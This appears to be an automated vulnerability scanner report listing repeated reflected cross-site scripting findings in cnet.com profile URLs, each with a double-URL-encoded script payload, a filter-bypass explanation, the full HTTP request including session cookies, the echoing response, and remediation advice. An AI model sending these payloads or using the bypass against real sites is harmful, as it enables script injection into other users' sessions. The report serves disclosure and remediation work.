<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>candacelombardi45ac8<script>alert(1)</script>06a4f8a6680's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99027%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed014422ea0d was submitted in the REST URL parameter 2. This input was echoed as 99027"><script>alert(1)</script>d014422ea0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/caroline.mccarthy99027%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed014422ea0d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:24 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:23 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="caroline.mccarthy99027"><script>alert(1)</script>d014422ea0d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1acec%253cscript%253ealert%25281%2529%253c%252fscript%253edd2c8ef73d1 was submitted in the REST URL parameter 2. This input was echoed as 1acec<script>alert(1)</script>dd2c8ef73d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/caroline.mccarthy1acec%253cscript%253ealert%25281%2529%253c%252fscript%253edd2c8ef73d1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:25 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:25 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=945
Connection: Keep-Alive
Content-Length: 31184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>caroline.mccarthy1acec<script>alert(1)</script>dd2c8ef73d1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74681%253cscript%253ealert%25281%2529%253c%252fscript%253e3b29cca028a was submitted in the REST URL parameter 2. This input was echoed as 74681<script>alert(1)</script>3b29cca028a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/daverosenberg74681%253cscript%253ealert%25281%2529%253c%252fscript%253e3b29cca028a/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:18 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:19 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=990
Connection: Keep-Alive
Content-Length: 31118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>daverosenberg74681<script>alert(1)</script>3b29cca028a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 196ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5c71f6a6858 was submitted in the REST URL parameter 2. This input was echoed as 196ab"><script>alert(1)</script>5c71f6a6858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/daverosenberg196ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5c71f6a6858/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:17 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:17 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="daverosenberg196ab"><script>alert(1)</script>5c71f6a6858"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b026%253cscript%253ealert%25281%2529%253c%252fscript%253e6bb646481bb was submitted in the REST URL parameter 2. This input was echoed as 6b026<script>alert(1)</script>6bb646481bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dcarnoy6b026%253cscript%253ealert%25281%2529%253c%252fscript%253e6bb646481bb/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:09 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:10 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31043
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dcarnoy6b026<script>alert(1)</script>6bb646481bb's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8b241de421 was submitted in the REST URL parameter 2. This input was echoed as ae3d0"><script>alert(1)</script>e8b241de421 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dcarnoyae3d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8b241de421/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:08 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:09 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Length: 31082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dcarnoyae3d0"><script>alert(1)</script>e8b241de421"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5abd0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9daa2b74cd6 was submitted in the REST URL parameter 2. This input was echoed as 5abd0"><script>alert(1)</script>9daa2b74cd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dd13reis5abd0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9daa2b74cd6/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:15 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:15 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Content-Length: 31093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dd13reis5abd0"><script>alert(1)</script>9daa2b74cd6"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3456e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1b6c1111e was submitted in the REST URL parameter 2. This input was echoed as 3456e<script>alert(1)</script>d1b6c1111e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dd13reis3456e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1b6c1111e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:17 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:17 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=959
Connection: Keep-Alive
Content-Length: 31028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dd13reis3456e<script>alert(1)</script>d1b6c1111e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d809%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61fc2ce22b1 was submitted in the REST URL parameter 2. This input was echoed as 3d809"><script>alert(1)</script>61fc2ce22b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/declan003d809%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61fc2ce22b1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:34 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=934
Connection: Keep-Alive
Content-Length: 31064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="declan003d809"><script>alert(1)</script>61fc2ce22b1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba651%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8079322cd was submitted in the REST URL parameter 2. This input was echoed as ba651<script>alert(1)</script>bc8079322cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/declan00ba651%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8079322cd/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:35 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:35 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=862
Connection: Keep-Alive
Content-Length: 31013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>declan00ba651<script>alert(1)</script>bc8079322cd's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34f7d%253cscript%253ealert%25281%2529%253c%252fscript%253efc7d096905d was submitted in the REST URL parameter 2. This input was echoed as 34f7d<script>alert(1)</script>fc7d096905d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/doreilly34f7d%253cscript%253ealert%25281%2529%253c%252fscript%253efc7d096905d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
